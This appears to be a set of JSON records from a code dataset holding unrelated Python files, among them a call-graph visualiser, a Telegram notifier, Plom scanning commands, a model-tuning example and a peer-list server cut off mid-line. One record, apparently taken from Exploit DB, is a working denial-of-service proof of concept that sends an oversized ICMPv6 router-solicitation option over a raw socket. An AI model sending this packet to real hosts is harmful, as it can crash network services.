'{0}/{1}'.format(params['PATH'], dir)\r\n\t\r\n\ttry:\r\n\t\tos.makedirs(path)\r\n\texcept:\r\n\t\tpath = create_dir(params)\r\n\t\r\n\treturn(path)\r\n\r\n# Make sure this is an independent process\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"MarcelMontrey/IngroupDiversity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71475128373","text":"from __future__ import print_function\n\nimport inspect\nimport logging\nimport copy\nimport os\nimport shutil\nfrom pathlib import Path\nimport graphviz as gviz\nimport __main__\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\ntry:\n __IPYTHON__ = get_ipython()\n import ipykernel.zmqshell\n import IPython.terminal.interactiveshell\n #if float(gviz.__version__[0:3]) < 1.4:\n # raise RuntimeError(\"IPython used with pygraphviz < 1.4 will experience \"\n # \"some bugs\")\n #from IPython.display import Image\nexcept NameError:\n __IPYTHON__ = None\n\ntry:\n __main__file__ = inspect.getfile(__main__)\nexcept TypeError:\n if __IPYTHON__:\n __main__file__ = \" 1:\n sg = gviz.Digraph(name=\"foo\")\n sg.graph_attr['rank'] = 'same'\n prev_node = None\n for child_node in child_nodes:\n if prev_node:\n sg.edge(str(prev_node), str(child_node),\n color=\"#ffffff\")\n prev_node = child_node\n g.subgraph(sg)\"\"\"\n\n # g.graph_attr['label']='nodes=%s' % count\n self.graph = g\n print(\"callviz: rendered to %s\" % (str(count)+self.filename))\n g.render(filename=str(count)+filename)\n\n # if not __IPYTHON__ or isinstance(__IPYTHON__, IPython.terminal.interactiveshell.TerminalInteractiveShell):\n # print(\"callviz: rendered to %s\" % (str(count)+self.filename))\n # g.render(filename=str(count)+filename)\n #\n # elif isinstance(__IPYTHON__, ipykernel.zmqshell.ZMQInteractiveShell):\n # print(\"callviz: Rendering in inline in Jupyter Notebook 2\")\n # g.render(filename=str(count)+filename)\n # return g\n count+=1\n os.chdir(absPath+'/pics')\n\n\n def _repr_svg_(self):\n svg = self.render()._repr_svg_()\n self.reset()\n return svg\n\nclass NodeData(object):\n def __init__(self, _args=None, _kwargs=None, _fnname=\"\",\n _ret=None, _childmethods=[]):\n self.args = _args\n self.kwargs = _kwargs\n self.fn_name = _fnname\n self.ret = _ret\n self.child_methods = _childmethods # [ (method, gcounter) ]\n\n self.auxdata = {} # user assigned track data\n\n def __str__(self):\n return \"%s -> child_methods: %s\" % (self.nodestr(), self.child_methods)\n\n def nodestr(self):\n return \"%s = %s(%s)\" % (self.ret, self.fn_name, self.argstr())\n\n def argstr(self):\n s_args = \",\".join([str(arg) for arg in self.args])\n s_kwargs = \",\".join([(str(k), str(v))\n for (k, v) in self.kwargs.items()])\n return \"%s%s\" % (s_args, s_kwargs)\n\nclass viz(object):\n \"\"\"decorator to construct the call graph with args\n and return values as labels\n \"\"\"\n\n def __init__(self, callgraph, *args, **kwargs):\n \"\"\"\n If there are decorator arguments, the function\n to be decorated is not passed to the constructor!\n \"\"\"\n self._verbose = False\n if not isinstance(callgraph, CallGraph):\n raise ValueError(\"@viz decorator must be called with a CallGraph instance\")\n self.callgraph = callgraph\n\n def track(self, **kwargs):\n fullstack = trim_stack(inspect.stack())\n call_frame_id = id(fullstack[2][0])\n g_callers = self.callgraph.get_callers()\n node = g_callers.get(call_frame_id)\n if node:\n node.auxdata.update(copy.deepcopy(kwargs))\n\n def __call__(self, f, *args, **kwargs):\n \"\"\"\n With decorator arguments, __call__() is only called\n once, as part of the decoration process! You can only give\n it a single argument, which is the function object.\n \"\"\"\n\n\n def wrapped_f(*args, **kwargs):\n # id_count = 0\n # Expected parameters for the function being wrapped\n g_callers = self.callgraph.get_callers()\n g_frames = self.callgraph.get_frames()\n\n # find the caller frame, and add self as a child node\n caller_frame_id = None\n\n fullstack = trim_stack(inspect.stack())\n\n if self._verbose:\n logging.debug(\"Full Stack:\")\n for stack in fullstack:\n logging.debug(\"\\t\" + str(stack))\n\n if len(fullstack) > 2:\n caller_frame_id = id(fullstack[2][0])\n\n if self._verbose:\n logging.debug(\"Caller Frame: %s %s\" % (caller_frame_id,\n fullstack[2]))\n\n this_frame_id = id(fullstack[0][0])\n if self._verbose:\n logging.info(\"This Frame: %s %s\" % (this_frame_id, fullstack[0]))\n\n if this_frame_id not in g_frames:\n g_frames.append(fullstack[0][0])\n\n if this_frame_id not in g_callers.keys():\n g_callers[this_frame_id] = NodeData(args, kwargs,\n f.__name__,\n None, [])\n\n edgeinfo = None\n if caller_frame_id:\n edgeinfo = [this_frame_id, self.callgraph.get_counter()]\n print(caller_frame_id)\n print(list(g_callers.keys())[0])\n #whats the differentiator of the submit address and recursive addresses\n if int(str(caller_frame_id)[0]) == 4:\n caller_frame_id = list(g_callers.keys())[0]\n #if not 4, change to len, or different differentiator\n\n if (this_frame_id!= caller_frame_id):\n g_callers[caller_frame_id].child_methods.append(edgeinfo)\n self.callgraph.increment()\n\n\n ret = f(*args, **kwargs)\n g_callers[this_frame_id].ret = copy.deepcopy(ret)\n\n if self._verbose:\n logging.debug('Unwinding Frame ID: %s' % this_frame_id)\n\n if edgeinfo:\n edgeinfo.append(self.callgraph.get_unwindcounter())\n self.callgraph.increment_unwind()\n\n return ret\n\n wrapped_f.track = self.track\n return wrapped_f\n","repo_name":"beehaa/Visualizing-Recursive-Trees","sub_path":"algs_final/rcviz/rcviz.py","file_name":"rcviz.py","file_ext":"py","file_size_in_byte":10446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39904942502","text":"import logging\nimport time\nfrom urllib.parse import urljoin\n\nfrom notification_provider import provider\nfrom utils.config_reader import AbsConfigReader\nfrom utils.helper import get_request_controller, retry\n\n\nclass TelegramNotificationProvider(provider.NotificationProvider):\n def __init__(self, name: str, config_reader: AbsConfigReader) -> None:\n self.config_reader = config_reader\n self.name = name\n self.request_handler = get_request_controller()\n self.type, self.enable, self.host, self.token, self.channel_name, self.chat_id = \\\n self._init_conf(config_reader)\n if not self.chat_id and self.enable:\n self.chat_id = self.get_channel_chat_id(self.channel_name)\n if self.chat_id:\n self.save_conf(channel_chat_id=self.chat_id)\n\n @staticmethod\n def _init_conf(config_reader: AbsConfigReader) -> tuple:\n conf = config_reader.read()\n return conf.get(\"type\"), conf.get(\"enable\", False), conf.get(\"host\"), conf.get(\"bot_token\"), conf.get(\n \"channel_name\"), conf.get(\"channel_chat_id\")\n\n def get_provider_name(self) -> str:\n return self.name\n\n def provider_enabled(self) -> bool:\n return self.enable\n\n def get_channel_chat_id(self, channel_name) -> str:\n url = urljoin(self.host, f\"/bot{self.token}/getUpdates\")\n resp = self.request_handler.get(url, timeout=5).json()\n for res in resp.get(\"result\", [])[::-1]:\n for value in res.values():\n if isinstance(value, dict):\n chat = value.get(\"chat\", {})\n if chat.get(\"type\") == \"channel\" and chat.get(\"title\") == channel_name:\n return chat.get(\"id\")\n logging.error(\"[Telegram] chat_id not found, response: %s\", resp)\n return \"\"\n\n @retry()\n def push(self, title, **kwargs) -> bool:\n url = urljoin(self.host, f\"/bot{self.token}/sendMessage\")\n text = self.format_message(title, **kwargs)\n data = {\n 'chat_id': self.chat_id,\n 'text': text,\n 'parse_mode': 'Markdown'}\n resp = self.request_handler.post(url, data=data, timeout=5).json()\n if resp.get(\"ok\"):\n return True\n if resp.get(\"error_code\") == 400:\n # 格式化之后的 markdown 文本格式识别出错,记录下来用于分析\n logging.error(\n \"[Telegram] push failed, exc:%s, text:%s\", resp.get(\"description\"), text\n )\n if resp.get(\"error_code\") == 429:\n # 请求过于频繁,等待提示时间\n retry_after = resp.get(\"parameters\", {}).get(\"retry_after\", 5)\n time.sleep(retry_after)\n raise Exception(\"time sleep require\")\n return False\n\n def format_message(self, title, **kwargs) -> str:\n message = [f\"*{title}*\"] if title else []\n for key, value in kwargs.items():\n message.append(f\"`{key}`: {value}\")\n return \"\\n\".join(message)\n\n def save_conf(self, **kwargs) -> None:\n logging.info(\"[Telegram] update telegram conf: %s\", kwargs)\n self.config_reader.parcial_update(lambda notification_conf: notification_conf[\"telegram\"].update(kwargs))\n","repo_name":"opennaslab/kubespider","sub_path":"kubespider/notification_provider/telegram_notification_provider/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":1636,"dataset":"github-code","pt":"21"} +{"seq_id":"22665496632","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport unittest\nfrom google_page import GooglePage\n\n@classmethod\nclass TestGoogle(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome(ChromeDriverManager().install())\n \n def test_google(self):\n google = GooglePage(self.driver)\n google.open()\n google.search('Platzi')\n self.assertEqual('Platzi', google.keyboard)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n\n","repo_name":"JFOZ1010/Python-Files-Proofs","sub_path":"selenium/test_google.py","file_name":"test_google.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3653544941","text":"\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the equalizeArray function below.\r\ndef equalizeArray(arr):\r\n temp = []\r\n counts = []\r\n\r\n for i in range(len(arr)):\r\n found = 0\r\n for j in range(len(temp)):\r\n if temp[j] == arr[i]:\r\n counts[j] = counts[j] + 1\r\n found = 1\r\n if found == 0:\r\n temp.append(arr[i])\r\n counts.append(1)\r\n\r\n #print(temp)\r\n #print(counts)\r\n print (len(arr)-max(counts))\r\n #return (len(arr)-max(counts))\r\n print (len(arr)-max([arr.count(i) for i in arr]))\r\n return len(arr)-max([arr.count(i) for i in arr])\r\n \r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n n = int(input())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n result = equalizeArray(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()","repo_name":"ruiteng2021/HackerRank","sub_path":"Python/EqualizeTheArray/EqualizeTheArray.py","file_name":"EqualizeTheArray.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32503762578","text":"from struct import pack\nimport socket\nimport sys\n\nND_ROUTER_SOLICIT = 133\nICMP6_OPT_SOURCE_MAC = 1\n\ndef u8(x):\n return pack(\"B\", x)\n\ndef send_packet(data, host):\n print(\"[+] sending {} bytes to {}\".format(len(data), host))\n s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))\n\n if s.sendto(data, (host, 0)) != len(data):\n print(\"[!] Could not send (full) payload\")\n s.close()\n\nif __name__ == '__main__':\n assert len(sys.argv) == 2, \"Run via {} \".format(sys.argv[0])\n host, = sys.argv[1:]\n pkg = b\"\".join([\n u8(ND_ROUTER_SOLICIT), # type\n u8(0), # code\n b\"X\" * 2, # checksum\n b\"\\x00\" * 4, # reserved\n u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac\n u8(255), # Have 255 MACs!\n b\"A\" * 255 * 8,\n ])\n\n send_packet(pkg, host)\n","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/multiple/dos/42942.py","file_name":"42942.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"73028137973","text":"from __future__ import print_function, division\n\n\nimport pysmac\nimport numpy\nimport sklearn.ensemble\nimport sklearn.datasets\nimport sklearn.cross_validation\n\n\n# We use the same data as the earlier sklearn example.\nX,Y = sklearn.datasets.make_classification(1000, n_features=20, n_informative=10, n_classes=10, random_state=2)\t\t# seed yields a mediocre initial accuracy on my machine\n\n# But this time, we do not split it into train and test data set, but we will use\n# k-fold cross validation instead to estimate the accuracy better. Here,we shall\n# use k=10 for demonstration purposes. To make thins more convinient later on,\n# let's convert the KFold iterator into a list, so we can use indexing.\nkfold = [(train,test) for (train,test) in sklearn.cross_validation.KFold(X.shape[0], 10)]\n\n# To demonstrate the use of features, let's use the class frequencies of a fold\n# as features. It will turn out that those are not informative features, as they are almost\n# all the identical, but good dataset features are beyond the scope of this example.\nfeatures = numpy.array([numpy.bincount(Y[test], minlength=10) for (test,train) in kfold])\n\n# We have to make a slight modification to the function fitting the random forest.\n# it now has to take an additional argument instance. (Note: SMAC grew historically\n# in the context of algorithm configuration, where the performance across multiple\n# instances is optimized. The naming convention is a tribute to that heritage.)\n# This argument will be a integer between 0 and num_instances (defined below).\n# Note that this increases the computational effort as SMAC now estimates the \n# quality of a parameter setting for multiple instances.\ndef random_forest(n_estimators,criterion, max_features, max_depth, bootstrap, instance):\n\n\t# Use the requested fold\n\ttrain, test = kfold[instance]\n\tX_train, Y_train, X_test, Y_test = X[train], Y[train], X[test], Y[test]\n\t\n\tpredictor = sklearn.ensemble.RandomForestClassifier(n_estimators = n_estimators, criterion=criterion, max_features = max_features, max_depth = max_depth, bootstrap=bootstrap)\n\tpredictor.fit(X_train, Y_train)\n\t\n\treturn -predictor.score(X_test, Y_test)\n\n\n# Convenience function to model compute the true mean accuracy across all\n# 10 folds.\ndef true_accuracy(**config):\n\taccuracy = 0.\n\n\tpredictor = sklearn.ensemble.RandomForestClassifier(**config)\n\tfor train, test in kfold:\n\t\tX_train, Y_train, X_test, Y_test = X[train], Y[train], X[test], Y[test]\n\t\tpredictor.fit(X_train, Y_train)\n\t\taccuracy += predictor.score(X_test, Y_test)\n\treturn(accuracy/len(kfold))\n\nprint('The default accuracy is %f'%true_accuracy())\n\t\n\n# We haven't changed anything here.\nparameter_definition=dict(\\\n\t\tmax_depth =(\"integer\", [1, 10], 4),\n\t\tmax_features=(\"integer\", [1, 20], 10),\n\t\tn_estimators=(\"integer\", [1,100], 10, 'log'),\t\t\t\n\t\tcriterion =(\"categorical\", ['gini', 'entropy'], 'entropy'),\n\t\tbootstrap =(\"integer\", [0,1], 1)\n\t\t)\n\n# Same creation of the SMAC_optimizer object\nopt = pysmac.SMAC_optimizer( working_directory = '/tmp/pysmac_test/',# the folder where SMAC generates output\n\t\t\t\t\t\t\t persistent_files=True,\t\t\t\t # whether the output will persist beyond the python object's lifetime\n\t\t\t\t\t\t\t debug = False\t\t\t\t\t\t\t # if something goes wrong, enable this for diagnostic output\n\t\t\t\t\t\t\t)\n\n\n# The minimize method also has optional arguments\nvalue, parameters = opt.minimize(random_forest,\n\t\t\t\t\t200, parameter_definition,\n\t\t\t\t\tnum_runs = 2,\t\t\t\t\t# number of independent SMAC runs\n\t\t\t\t\tseed = 0,\t\t\t\t\t\t# the random seed used. can be an int or a list of ints of length num_runs\n\t\t\t\t\tnum_procs = 2,\t\t\t\t\t# pysmac can harness multicore architecture. Specify the number of processes to use here.\n\t\t\t\t\tnum_train_instances = len(kfold),# This tells SMAC how many different instances there are.\n\t\t\t\t\ttrain_instance_features = features# use the features defined above to better predict the overall performance\n\t\t\t\t\t)\n\t\nprint('Parameter setting %s'%parameters)\nprint('The highest accuracy estimation: %f'%(-value))\nprint('The highest accuracy actually is: %f'%(true_accuracy(**parameters)))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/automl_pysmac/pysmac-master/examples/sklearn_example_advanced_crossvalidation.py","file_name":"sklearn_example_advanced_crossvalidation.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"11177431904","text":"#!/usr/bin/python3\n\n#Part 2F\nimport Regression as reg\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nalpha = np.linspace(0.001,10,100)\n\ndataset = datasets.fetch_california_housing()\nX_train, X_test, y_train, y_test = train_test_split(dataset['data'],\n dataset['target'],\n test_size=0.2,\n random_state=42)\n\nmodel1 = reg.LinearRegression()\nmodel2 = reg.RidgeRegression()\n\n\nr2_LR_m1 = []\nr2_RR_m2 = []\n\nmodels = [model1, model2]\nfor aval in alpha:\n model1.set_params(alpha = aval)\n model2.set_params(alpha = aval)\n \n model1.fit(X_train, y_train);\n model2.fit(X_train, y_train);\n \n r2_m1 = model1.score(X_test, y_test)\n r2_m2 = model2.score(X_test, y_test)\n r2_LR_m1.append(r2_m1)\n r2_RR_m2.append(r2_m2)\n \n \nplt.figure(figsize = (6,6))\nplt.plot(alpha, r2_LR_m1, 'g-', label = \"Model 1: Linear Regression R2 scores\")\nplt.plot(alpha, r2_RR_m2, 'r-', label = \"Model 2: Ridge Regression R2 scores\")\nplt.title(\"Comparision of Ridge and Linear Regression R2 scores\")\nplt.xlabel(\"Alpha values\")\nplt.xscale(\"log\")\nplt.ylabel(\"R2 scores\")\nplt.legend()\nplt.draw()\nplt.savefig(\"P2F.png\", dpi = 300, bbox_inches = 'tight')\n\nplt.show()\n \n \n\n","repo_name":"Adritsheu/Systems_development","sub_path":"homework/HW3/HW3-final/model_performance.py","file_name":"model_performance.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7996568692","text":"from tabulate import tabulate\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom plom.scan.question_list_utils import check_question_list\nfrom Papers.services import SpecificationService\nfrom ...services import ScanCastService, ScanService\n\n\nclass Command(BaseCommand):\n \"\"\"python3 manage.py plom_staging_unknowify_page discard (bundle name) (bundle_order).\"\"\"\n\n help = \"\"\"Assign an extra page to a paper and question(s). Note that\n this command cannot cast a page to the 'extra'-type, instead one\n should use the plom_staging_extralise command.\"\"\"\n\n def list_paper_numbers(self, bundle_name):\n scanner = ScanService()\n paper_numbers = scanner.get_bundle_paper_numbers_cmd(bundle_name)\n self.stdout.write(f\"Papers in bundle {bundle_name}: {paper_numbers}\")\n\n def list_extra_pages(self, bundle_name):\n scanner = ScanService()\n bundle_page_dict = scanner.get_bundle_extra_pages_info_cmd(bundle_name)\n bundle_page_list = [[\"order\", \"status\", \"info\", \"rotation\"]]\n for ord in sorted(bundle_page_dict.keys()):\n page = bundle_page_dict[ord]\n if page[\"info\"][\"paper_number\"] and page[\"info\"][\"question_list\"]:\n bundle_page_list.append(\n [\n page[\"order\"],\n page[\"status\"],\n f\"paper {page['info']['paper_number']}: q{page['info']['question_list']}\",\n page[\"rotation\"],\n ]\n )\n else:\n bundle_page_list.append(\n [\n page[\"order\"],\n page[\"status\"],\n \"extra page without data\",\n page[\"rotation\"],\n ]\n )\n\n self.stdout.write(\n tabulate(bundle_page_list, headers=\"firstrow\", tablefmt=\"simple_outline\")\n )\n\n def assign_extra_page(\n self, username, bundle_name, index, paper_number, question_list\n ):\n scs = ScanCastService()\n try:\n scs.assign_extra_page_cmd(\n username, bundle_name, index, paper_number, question_list\n )\n except ValueError as e:\n raise CommandError(e)\n\n def clear_extra_page_data(self, username, bundle_name, index):\n scs = ScanCastService()\n scs.clear_extra_page_cmd(username, bundle_name, index)\n\n def add_arguments(self, parser):\n sp = parser.add_subparsers(\n dest=\"command\",\n description=\"Assign an extra page to a paper and questions.\",\n )\n spl = sp.add_parser(\"list\", help=\"List the extra pages in the bundle.\")\n spl.add_argument(\n \"bundle\",\n type=str,\n help=\"The bundle on which to operate\",\n )\n\n spp = sp.add_parser(\n \"papers\", help=\"List the known paper-numbers in the bundle.\"\n )\n spp.add_argument(\n \"bundle\",\n type=str,\n help=\"The bundle on which to operate\",\n )\n\n spa = sp.add_parser(\n \"assign\", help=\"Assign the extra page a paper-number and question-list.\"\n )\n spa.add_argument(\"username\", type=str, help=\"username doing the assigning.\")\n spa.add_argument(\n \"bundle\",\n type=str,\n help=\"The bundle on which to operate\",\n )\n spa.add_argument(\n \"-i\", \"--index\", type=int, help=\"index of page within the bundle (from one)\"\n )\n spa.add_argument(\n \"-t\", \"--paper\", type=int, help=\"the paper-number of the extra-page\"\n )\n spa.add_argument(\n \"-q\",\n \"--question\",\n nargs=\"?\",\n metavar=\"N\",\n help=\"\"\"\n Which question(s) are answered on this page?\n You can pass a single integer, or a list like `[1,2,3]`\n which updates each page to questions 1, 2 and 3.\n You can also pass the special string `all` which uploads\n the page to all questions (this is also the default).\n \"\"\",\n )\n spc = sp.add_parser(\n \"clear\",\n help=\"Clear the extra-page data from the given extra-page in the bundle\",\n )\n spc.add_argument(\"username\", type=str, help=\"username doing the clearing.\")\n spc.add_argument(\n \"-i\", \"--index\", type=int, help=\"index of page within the bundle (from one)\"\n )\n\n def handle(self, *args, **options):\n if options[\"command\"] == \"list\":\n self.list_extra_pages(options[\"bundle\"])\n elif options[\"command\"] == \"papers\":\n self.list_paper_numbers(options[\"bundle\"])\n elif options[\"command\"] == \"assign\":\n if options[\"question\"] is None:\n options[\"question\"] = \"all\"\n n_questions = SpecificationService.get_n_questions()\n question_list = check_question_list(options[\"question\"], n_questions)\n self.assign_extra_page(\n options[\"username\"],\n options[\"bundle\"],\n options[\"index\"],\n options[\"paper\"],\n question_list,\n )\n elif options[\"command\"] == \"clear\":\n self.clear_extra_page_data(\n options[\"username\"],\n options[\"bundle\"],\n options[\"index\"],\n )\n else:\n self.print_help(\"manage.py\", \"plom_staging_assign_extra\")\n","repo_name":"plomgrading/plom","sub_path":"plom_server/Scan/management/commands/plom_staging_assign_extra.py","file_name":"plom_staging_assign_extra.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"70046005174","text":"from ..entity import (\n EntitySchema,\n SecondaryEntity,\n)\nfrom ..fields import (\n StringField,\n EntityField,\n MappingField,\n RawField,\n)\nfrom ..secondary.observable import Observable\nfrom ..validators import validate_string\n\n\nclass ObservedRelationSchema(EntitySchema):\n \"\"\"\n https://github.com/threatgrid/ctim/blob/master/doc/structures/sighting.md#observedrelation-object\n \"\"\"\n\n origin = StringField(\n validate=validate_string,\n required=True,\n )\n related = EntityField(\n type=Observable,\n required=True,\n )\n relation = StringField(\n validate=validate_string,\n required=True,\n )\n source = EntityField(\n type=Observable,\n required=True,\n )\n origin_uri = StringField(\n validate=validate_string,\n )\n relation_info = MappingField(\n keys=StringField,\n values=RawField,\n )\n\n\nclass ObservedRelation(SecondaryEntity):\n schema = ObservedRelationSchema\n","repo_name":"CiscoSecurity/tr-05-ctim-bundle-builder","sub_path":"bundlebuilder/models/secondary/observed_relation.py","file_name":"observed_relation.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19543552403","text":"from board import Board\r\nfrom life_like_automata import LifeLike\r\n\r\nclass GameOfLife(LifeLike):\r\n \"\"\"\r\n Conway's Game of Life automata.\r\n Each new state follows this rules:\r\n * Any live cell with fewer than two live neighbours dies, as if by underpopulation.\r\n * Any live cell with two or three live neighbours lives on to the next generation.\r\n * Any live cell with more than three live neighbours dies, as if by overpopulation.\r\n * Any dead cell with exactly three live neighbours becomes a live cell, as if by reproduction.\r\n \"\"\"\r\n def __init__(self, board):\r\n super().__init__(board)\r\n \r\n assert self.board.range == 1, \"Illegal number of states possible.\"\r\n\r\n def determine_next_cell_state(self, cell, neighbors):\r\n \"\"\"\r\n Process the logic necesarry to update a given cell of the automata.\r\n\r\n Returns\r\n -------\r\n cell : int\r\n A number that represents the state of a cell, either a 0 or a 1.\r\n \"\"\"\r\n if cell == self.ALIVE_CELL:\r\n if neighbors == 0 or neighbors == 1 or neighbors > 3:\r\n cell = self.DEAD_CELL\r\n else:\r\n if neighbors == 3:\r\n cell = self.ALIVE_CELL\r\n\r\n return cell","repo_name":"benstt/automatek","sub_path":"src/game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32348428616","text":"minimum_string_length = 1\nrequired_char_length = 1\n\ndef count_character_appearances(letter, target_string):\n if not _inputs_are_valid(letter, target_string):\n return False\n return len([l for l in target_string if l == letter])\n\ndef find_character_appearances(letter, target_string):\n if not _inputs_are_valid(letter, target_string):\n return False\n appearances = []\n for i in range(0, len(target_string)):\n if target_string[i] != letter: continue\n appearances.append(i)\n return appearances\n\ndef _inputs_are_valid(letter, target_string):\n # arguments_valid = True\n # if not isinstance(target_string, str):\n # arguments_valid = False\n # if len(target_string) == 0:\n # arguments_valid = False\n # if not isinstance(letter, str):\n # arguments_valid = False\n # if len(letter) != 1:\n # arguments_valid = False\n # return arguments_valid\n if not isinstance(letter, str) or not isinstance(target_string, str):\n return False\n if len(target_string) < minimum_string_length:\n return False\n if len(letter) != required_char_length:\n return False\n return True\n\nif __name__ == '__main__':\n print(count_character_appearances('a', 'aardvark'))\n print(find_character_appearances('a', 'aardvark'))\n","repo_name":"jsoules/vs-code-introduction","sub_path":"05-refactoring-tools/assets/example3d-editing.py","file_name":"example3d-editing.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12642631866","text":"import cv2\nimport torchvision\nimport toml\nimport numpy as np\n\nclass Dataset(torchvision.datasets.VisionDataset):\n\n\n def __init__(self, root, train=True, transforms=None, transform=None, target_transform=None):\n super(Dataset, self).__init__(root, transforms, transform, target_transform)\n self.root = root\n label_path = f'{self.root}/0.toml'\n label_dist = toml.load(label_path)\n self.action_label_dist = label_dist['Action label']\n self.path_and_label = list(label_dist['Video label'].items())\n data_number = len(self.path_and_label)\n train_number = int(data_number * 5 / 6)\n if train:\n self.number = train_number\n self.path_and_label = self.path_and_label[:train_number]\n else:\n self.path_and_label = self.path_and_label[train_number:]\n self.number = len(self.path_and_label)\n\n def __getitem__(self, index):\n video_name, label = self.path_and_label[index]\n video_path = f'{self.root}/{video_name}'\n cap = cv2.VideoCapture(video_path)\n if not cap.isOpened():\n raise ValueError('No file in path. Check the `root` path.')\n frame_number = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n video = []\n for _ in range(int(frame_number)):\n ok, image = cap.read()\n if not ok: \n raise ValueError('Failed read video.')\n video.append(image.T)\n return np.array(video).astype(np.float32), self.action_label_dist[label]\n\n\n\n def __len__(self):\n return self.number\n\nif __name__ == '__main__':\n root = 'data/uiuc_T01_camera_action_dataset'\n train_t01 = Dataset(root, train=True)\n test_t01 = Dataset(root, train=False)\n print(f'Train : {train_t01}')\n print(f'Test : {test_t01}')\n","repo_name":"latte488/camera_action_dataset","sub_path":"camera_action_dataset.py","file_name":"camera_action_dataset.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22999174907","text":"import random\nrocklist = [\"rock\",\"paper\", \"scissors\"]\n\ndef get_yn(prompt):\n play = input(str(prompt) + \" (y/n) \")\n first = play[0]\n play = first.lower()\n return play\n\ndef userinput():\n while True:\n user = input(\"Rock, Paper, Scissors?\")\n user = user.lower()\n if user in rocklist:\n return rocklist.index(user)\n else:\n print(\"Bad Input. Please type from list\")\n\ndef compare(user, com):\n if user == 0:\n if com == 0:\n return \"tie\"\n elif com == 1:\n return(\"com\")\n elif com == 2:\n return \"user\"\n elif user == 1:\n if com == 0:\n return \"user\"\n elif com == 1:\n return \"tie\"\n elif com == 2:\n return \"com\"\n elif user == 2:\n if com == 0:\n return \"com\"\n elif com == 1:\n return \"user\"\n elif com == 2:\n return \"tie\"\n\ndef playGame():\n user = userinput()\n print(\"User Chose: \" + rocklist[user] )\n com = random.randrange(0,3,1)\n print(\"Com Chose: \" + rocklist[com] )\n return compare(user, com)\n\n\ndef playGameLoop():\n print(\"welcome to RPS\")\n\n play = get_yn(\"Play a round of RPS?\")\n\n\n while play == \"y\" :\n winner = playGame()\n print(\"winner: \" + winner)\n play = get_yn(\"Play RPS again?\")\n\n\nplayGameLoop()","repo_name":"jonahdjohansen/jonahdjohansen.github.io","sub_path":"CS160/Python/RockPaper.py","file_name":"RockPaper.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42361719677","text":"# Python file to implement the Registration Server(RS) that maintains the Peer list data structure.\n\n# Created for CSC573 - Project1\n\n# Author hpalani and akrish12\n\nimport random\nimport time\nimport socket\nimport pickle\nimport platform\n\n\n# Class that contains the record of each peer\nclass PeerData:\n def __init__(self, host=None, port_number=None, cookie=None):\n self.hname = host\n self.port = port_number\n self.flag_active = True\n self.cookie = cookie # Cookie assigned to the peer\n self.TTL = 7200 # TTL field\n self.recent_regtime = time.strftime(\"%H:%M:%S\") # Recent time/date the peer has registered\n if self.cookie == None:\n print('In None block')\n self.cookie = random.randint(1, 50)\n print(self.cookie)\n self.number_of_activetimes = 0\n else:\n self.cookie = cookie\n self.number_of_activetimes = calculate_instance(self.hname, peer_list)\n\n\n# Class to maintain the list of Peers\nclass PeerList:\n def __init__(self):\n self.head = None\n\n def add(self, peer):\n temp = NodePeer(peer)\n temp.setnext(self.head)\n self.head = temp\n\n def display(self):\n temp = self.head\n while temp != None:\n peer_obj = temp.peer_obj()\n print(\"Peer object data\", peer_obj.hname, peer_obj.port, peer_obj.cookie, peer_obj.flag_active, 